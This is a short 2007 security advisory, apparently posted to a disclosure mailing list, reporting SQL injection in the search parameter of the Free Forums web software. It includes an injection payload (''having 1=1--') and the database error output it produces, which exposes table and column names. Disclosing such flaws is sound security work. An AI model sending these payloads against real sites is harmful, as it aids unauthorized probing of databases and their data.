Date: 14 Nov 2007 00:44:51 -0000
From: [email protected]
To: [email protected]Subject: Free Forums "search" Sql Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
http://Aria-Security.net
Aria-Security Team
------------------------------------
Free Forums Sql Injection
Vendor: http://www.nvecs.com/forums
the search parameter hast an sql injection
example:
'having 1=1--
result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1--%')) Order By Topics.AddDate;'.
or just a simple '
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'.
Regards,
The-0utl4w
Credit Goes to Aria-Security Team
